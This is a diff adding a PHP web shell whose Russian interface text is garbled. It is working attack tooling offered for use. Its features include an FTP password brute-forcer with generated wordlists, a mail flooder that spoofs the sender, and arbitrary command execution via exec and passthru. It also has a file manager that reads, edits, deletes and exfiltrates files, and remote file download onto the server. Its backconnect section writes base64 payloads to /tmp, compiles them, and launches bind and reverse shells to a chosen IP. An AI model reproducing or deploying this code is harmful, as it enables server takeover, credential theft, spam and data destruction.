+ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+$ftp_user_name=$g[1];
+$ftp_user_pass=$g[1];
+$conn_id=ftp_connect($ftp_server);
+$login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
+
+if (($conn_id) && ($login_result)) {
+echo "<b>����������� login:password - ".$ftp_user_name.":".$ftp_user_name."</b><br>";
+ftp_close($conn_id);}
+else {
+echo $ftp_user_name." - error<br>";
+}
+}}
+break;
+
+case "ftp":
+
+echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
+ <form action='$PHP_SELF?ac=ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+ <b><a href=?ac=ftppass>��������� �� ������ login\password</a></b>
+</td></tr>
+ 
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTP Host:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;����������� �������:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='number' size=10> <1000 pass </td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;������ ��� ��������:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='testing' size=50>
+<input type='submit' value='Brut FTP' class=button1 $style_button><br><b>��� ����������� � pass.txt</b></td></tr>
+
+
+ 
+ </form></table>";
+ 
+ 
+function s() {
+   $word="qwrtypsdfghjklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+
+function g() {
+   $word="euioam";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+
+function name0() {   return s().g().s();                        }
+function name1() {   return s().g().s().g();                    }
+function name2() {   return s().g().g().s();                    }
+function name3() {   return s().s().g().s().g();                }
+function name4() {   return g().s().g().s().g();                }
+function name5() {   return g().g().s().g().s();                }
+function name6() {   return g().s().s().g().s();                }
+function name7() {   return s().g().g().s().g();                }
+function name8() {   return s().g().s().g().g();                }
+function name9() {   return s().g().s().g().s().g();            }
+function name10() {   return s().g().s().s().g().s().s();        }
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+function randword() {
+   global $cool;
+   $func="name".mt_rand(0,11);
+   $func2="name".mt_rand(0,11);
+   switch (mt_rand(0,11)) {
+      case 0: return $func().mt_rand(5,99);
+      case 1: return $func()."-".$func2();
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+      case 3: return $func()."!".$func();
+      case 4: return randpass(mt_rand(5,12));
+      default: return $func();
+   }
+ 
+ 
+}
+
+function randpass($len) {
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+   $s="";
+   for ($i=0; $i<$len; $i++) {
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+   }
+   return $s;
+}
+if (@unlink("pass.txt") < 0){
+echo "������ ���";
+exit;
+}
+$file="pass.txt"; 
+if($file && $host && $login){
+   $cn=mt_rand(30,30);
+for ($i=0; $i<$cn; $i++) {
+   $s=$cool2[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$s\n");
+   }
+ 
+  $cnt2=mt_rand(43,43);
+for ($i=0; $i<$cnt2; $i++) {
+   $r=$cool[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$login$r\n");
+}    
+$p="$testing";
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$p\n");
+   
+ $cnt3=mt_rand($number,$number);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$u\n");
+  } 
+  
+  if(is_file($file)){
+ $passwd=file($file,1000);
+  for($i=0; $i<count($passwd); $i++){
+   $stop=false;
+   $password=trim($passwd[$i]);
+   $open_ftp=@fsockopen($host,21);
+    if($open_ftp!=false){
+     fputs($open_ftp,"user $login\n");
+     fputs($open_ftp,"pass $password\n");
+     while(!feof($open_ftp) && $stop!=true){
+      $text=fgets($open_ftp,4096);
+      if(preg_match("/230/",$text)){
+       $stop=true;
+	   $f=@fopen($host._ftp,"a+");
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+       echo "
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
+<tr><td align=center class=pagetitle><b><font color=\"blue\">����������!!! ������ ��������.</font></b><br>
+&nbsp;&nbsp;�������: <b>$host</b><br>&nbsp;&nbsp;�����: <b>$login</b><br>&nbsp;&nbsp;������: <b>$password</b></td></tr></table>
+";exit;
+      }
+      elseif(preg_match("/530/",$text)){
+       $stop=true;
+      
+      }
+     }
+     fclose($open_ftp);
+   }else{
+    echo "
+	<TABLE CELLPADDING=0 CELLSPACING=0  width=500 align=center>
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>������� ������ ftp ��������!!! �� <b><u>$host</u></b> ������ 21 ����!</b></b></td></tr>
+</table>
+";exit;
+   }
+  }
+ }
+}
+
+
+break;
+// SQL Attack
+case "sql":
+
+break;
+
+
+
+
+
+
+// MailFlud
+case "mailfluder":
+
+$email=$_POST['email']; // ���� ������
+$from=$_POST['from']; // ���� ������
+$num=$_POST['num']; // ����� �����
+$text=$_POST['text']; // ����� �����
+$kb=$_POST['kb']; // ��� ������ (kb)
+?>
+<script language="JavaScript"><!--
+function reset_form() {
+document.forms[0].elements[0].value="";
+document.forms[0].elements[1].value="";
+document.forms[0].elements[2].value="";
+document.forms[0].elements[3].value="";
+document.forms[0].elements[4].value="";
+}
+//--></script>
+<?php
+if (($email!="" and isset($email)) and ($num!="" and isset($num)) and ($text!="" and isset($text)) and ($kb!="" and isset($kb))) {
+
+$num_text=strlen($text)+1; // ���������� ����� ������ + 1 (������ � �����)
+$num_kb=(1024/$num_text)*$kb;
+$num_kb=ceil($num_kb);
+
+for ($i=1; $i<=$num_kb; $i++) {
+$msg=$msg.$text." ";
+}
+
+for ($i=1; $i<=$num; $i++) {
+mail($email, $text, $msg, "From: $from");
+}
+
+$all_kb=$num*$kb;
+
+echo <<<EOF
+<p align="center">������: <b>$email</b><br>
+���-�� �����: <b>$num</b><br>
+����� ��������� �����: <b>$all_kb kb</b><br></p>
+EOF;
+
+}
+
+else {
+
+echo <<<EOF
+<form action="?ac=mailfluder" method="post">
+<table align="center" border="0" bordercolor="#000000">
+<tr><td>���� ������</td><td><input type="text" name="email" value="to@mail.com" size="25"></td></tr>
+<tr><td>�� �������� ����</td><td><input type="text" name="from" value="support@mail.com" size="25"></td></tr>
+<tr><td>����� �����</td><td><input type="text" name="num" value="5" size="25"></td></tr>
+<tr><td>����� �����</td><td><input type="text" name="text" value="fack fack fack" size="25"></td></tr>
+<tr><td>��� ������ (KB)</td><td><input type="text" name="kb" value="10" size="25"></td></tr>
+<tr><td colspan="2" align="center"><input type="submit">&nbsp;&nbsp;<input type="button" onclick="reset_form()" value="Reset"></td></tr>
+</table>
+</form>
+EOF;
+
+}
+break;
+
+case "tar":
+# ��������� ����������
+$fullpath = $d."/".$tar;
+/* ������ ��������� ����� ������ ���������*/
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+for ($i=0; $i<6; $i++)  $charsname .= $CHARS[rand(0,strlen($CHARS)-1)];
+ echo "<br>
+������� <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $charsname.tar.gz")."�������� � ���� <u>$charsname.tar.gz</u>";
+
+
+
+echo "
+
+<form action='?ac=tar' method='post'>
+<tr><td align=center colspan=2 class=pagetitle><b>��������� <u>$name.tar.gz</u>:</b></td></tr>
+<tr>
+<td valign=top><input type=text name=archive size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+<td valign=top><input type=submit value='������'></td>
+</tr></form>";
+
+exec($archive);
+
+break;
+
+
+// ���������
+case "navigation":
+
+ // ����� ���������
+$mymenu = " [<a href='$php_self?ac=navigation&d=$d&e=$e'>�������� </a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&delete=1'>�������</a>] [<a href='$php_self?ac=navigation&d=$d&ef=$e&edit=1'>�������������</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&clean=1'>��������</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&replace=1'>�������� �����</a>] [<a href='$php_self?ac=navigation&d=$d&download=$e'>���������</a>]<br>";
+if(@$_GET['download']){
+@$download=$_GET['download'];
+@$d=$_GET['d'];
+header("Content-disposition: attachment; filename=\"$download\";");
+readfile("$d/$download");
+exit;}
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+
+
+
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?ac=navigation&d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?ac=navigation&d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?ac=navigation&d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+echo "</td></tr>";
+//if($os=="unix"){ echo "
+//<tr><td><b>id:</b> ".@exec('id')."</td></tr>
+//<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";}
+if(@$_GET['delfl']){
+@$delfolder=$_GET['delfolder'];
+echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
+(All files must be writable)<br>
+<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?ac=navigation&d=$d'>No</a><br><br>
+";
+exit;
+}
+if(@$_GET['deldir']){
+@$dir=$_GET['dir'];
+function deldir($dir)
+{
+$handle = @opendir($dir);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$dir/$ff")){
+deldir("$dir/$ff");
+}else{
+@unlink("$dir/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($dir)){
+@$success = true;}
+return @$success;
+}
+$dir=@$dir;
+deldir($dir);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?ac=navigation&d=".@$x."'\">";
+echo $copyr;
+exit;}
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo $mymenu ;
+echo "
+�������� ������:<br>
+(�� ������ �������� ����� �����)<br>
+����: $de<br>
+<form method=post>
+1. ���� IP<br>
+2. IP microsoft.com :)<br>
+�������� ��� <input name=this size=30 value=$ip> ���� <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=��������>
+</form>
+";
+
+if(@$_POST['doit']){
+
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$this","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$this �������� �� $bythis<br>
+[<a href='$php_self?ac=navigation&d=$d&e=$e'>���������� ����</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="$d/$e ������! <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?ac=navigation&d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red><br><b>������ ������</b></font><br>";}}
+echo $mymenu ;
+echo "
+���������� �����:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>";
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+��������: �� ������?<br>
+<a href=\"$php_self?ac=navigation&d=$d&e=$e&delete=".@$delete."&yes=yes\">��</a> || <a href='$php_self?no=1'>���</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red><br><b>������ ������</b></font><br>";}}
+echo $mymenu ;
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+��������������:<br>
+$de<br>
+<form method=post>
+<input type=HIDDEN name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='��������� ���������'></form><br>
+
+";
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+$editf=stripslashes($editf);
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$ef\">";
+exit;
+}
+echo $copyr;
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
+<tr><td bgcolor=#4d9ef0><center><b>��������</b></td><td bgcolor=#4d9ef0><center><b>���</b></td><td bgcolor=#4d9ef0><b>������</b></td><td bgcolor=#4d9ef0><center><b>��������/������</b></td><td bgcolor=#4d9ef0><b>�����</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>������� �� ���������� ��� ������ � ���� ��������!</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+
+
+for($i=0; $i<count($dirs); $i++){
+if(is_writable($dirs[$i])){$info="<font color=green><li>&nbsp;W</font>";}
+else{$info="<font color=red><li>&nbsp;R</font>";}
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#aed7ff";}else{$color="#68adf2";}   
+$linkd="<a href='$php_self?ac=navigation&d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+for($i=0; $i<count($files); $i++){
+if(is_writable($files[$i])){$info="<font color=green><li>&nbsp;W</font>";}
+else{$info="<font color=red><li>&nbsp;R</font>";}
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#ccccff";}else{$color="#b0b0ff";}  
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?ac=navigation&d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href='$php_self?ac=navigation&d=$d&download=$files[$i]' title='Download $files[$i]'><font size=2 face=Webdings color=green>`</font></a></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+echo "</table></td></tr></table>";
+echo $copyr;
+break;
+
+// ��������� �������
+case "backconnect":
+echo "<b>��������� ������� / �������� �����</b>";
+echo "<form name=bind method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>������� ���� </b>";
+echo "<input type=text name=port size=15 value=11457>&nbsp;";
+echo "<b>������ ��� ������� </b>";
+echo "<input type=text name=bind_pass size=15 value=nrws>&nbsp;";
+echo "<b>������������ </b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=�������>";
+echo "</font>";
+echo "</form>";
+
+echo "<b>��������� ������� / connect-back</b>";
+echo "<form name=back method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>IP-����� </b>";
+echo "<input type=text name=ip size=15 value=127.0.0.1>&nbsp;";
+echo "<b>���� </b>";
+echo "<input type=text name=port size=15 value=31337>&nbsp;";
+echo "<b>������������ </b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=���������>";
+echo "</font>";
+echo "</form>";
+
+
+/* port bind C */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ $w_file=fopen("/tmp/bd.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>������! ���������� ������ � /tmp/bd.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/bd /tmp/bd.c");
+ unlink("/tmp/bd.c");
+ $bind_string="/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &";
+ $blah=exec($bind_string);
+ $_POST['cmd']="ps -aux | grep bd";
+ $err=0;
+ }
+}
+
+/* port bind Perl */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/bdpl","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>������! ���������� ������ � /tmp/</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_pl));
+ fclose($w_file);
+ $bind_string="perl /tmp/bdpl ".$_POST['port']." &";
+ $blah=exec($bind_string);
+ $_POST['cmd']="ps -aux | grep bdpl";
+ $err=0;
+ }
+}
+
+/* back connect Perl */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/back","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>������! ���������� ������ � /tmp/</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect));
+ fclose($w_file);
+ $bc_string="perl /tmp/back ".$_POST['ip']." ".$_POST['port']." &";
+ $blah=exec($bc_string);
+ $_POST['cmd']="echo \"������ ������ ����������� � ".$_POST['ip']." port ".$_POST['port']." ...\"";
+ $err=0;
+ }
+}
+
+/* back connect C */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ $w_file=fopen("/tmp/back.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>������! ���������� ������ � /tmp/back.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/backc /tmp/back.c");
+ unlink("/tmp/back.c");
+ $bc_string="/tmp/backc ".$_POST['ip']." ".$_POST['port']." &";
+ $blah=exec($bc_string);
+ $_POST['cmd']="echo \"������ ������ ����������� � ".$_POST['ip']." port ".$_POST['port']." ...\"";
+ $err=0;
+ }
+}
+echo "<font face=Verdana size=-2>����������� �������: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<br>���������: ";
+echo "<font color=red size=2";
+print "".passthru($_POST['cmd'])."";
+echo "</font></b>";
+break;
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>�������� ������</b>
+<a href='$php_self?ac=massupload&d=$d&t=massupload'>* ��������� ������� ���������� ������ *</a><br><br>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>����:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>�����:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="�������"></td><br>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "���� ������� �������� � ����� $uploadfile\n";
+    echo "���:" .$_FILES['file']['name']. "\n";
+    echo "������:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "�� ������ ��������� ����. Info:\n";
+    print_r($_FILES);
+}
+}
+
+
+echo "<form enctype='multipart/form-data' action='?ac=upload&status=ok' method=post>
+<b>�������� ������ � ���������� ����������:</b><br>
+ HTTP-���� � �����: <br>
+<input type='text' name='file3' value='http://' size=40><br>
+�������� ����� ��� ���� � ��������� �����: <br>
+<input type='text' name='file2' value='$docr/' size=40><br>
+<input type='submit' value='��������� ����'></form>";
+
+
+$data = @implode("", file($file3));
+$fp = @fopen($file2, "wb");
+@fputs($fp, $data);
+$ok = @fclose($fp);
+if($ok)
+{
+$size = filesize($file2)/1024;
+$sizef = sprintf("%.2f", $size);
+
+print "<br><center>�� ���������: <b>���� <u>$file2</u> ��������</b> (".$sizef."��) </center>";
+}
+else
+{
+print "<br><center><font color=red  size = 2><b>������ �������� �����</b></font></center>";
+}
+
+
+
+
+break;
+// Tools
+case "tools":
+echo "<form method=post>��������� md5-�����<br><input name=md5 size=30></form><br>";
+@$md5=@$_POST['md5'];
+if(@$_POST['md5']){ echo "md5 ������������:<br> ".md5($md5)."";}
+echo "<br>
+<form method=post>�����������/������������� base64<br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+����������:<br><textarea rows=8 cols=80>".base64_encode($base64)."</textarea><br>
+������������: <br><textarea rows=8 cols=80>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post>DES-�����������:<br><input name=des size=30></form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "DES ������������: <br>".crypt($des)."";}
+echo "<br>
+<form method=post>SHA1-�����������:<br><input name=sha1 size=30></form><br>";
+if(@$_POST['sha1']){
+@$des=@$_POST['sha1'];
+echo "SHA1 ������������: <br>".sha1($sha1a)."";}
+
+echo "<form method=POST>";
+echo "html-��� -> ����������������� ��������<br><input type=text name=data size=30>";
+
+
+if (isset($_POST['data']))
+{
+echo "<br><br><b>���������:<br></b>";
+$str=str_replace("%20","",$_POST['data']);
+for($i=0;$i<strlen($str);$i++)
+{
+$hex=dechex(ord($str[$i]));
+if ($str[$i]=='&') echo "$str[$i]";
+else if ($str[$i]!='\\') echo "%$hex";
+}
+}
+exit;
+break;
+// Mass Uploading
+case "massupload":
+
+
+echo "
+������� �������� ������:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$docr'><br>
+<input type=submit value=��������� name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile1</i><br>";}
+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile2</i><br>";}
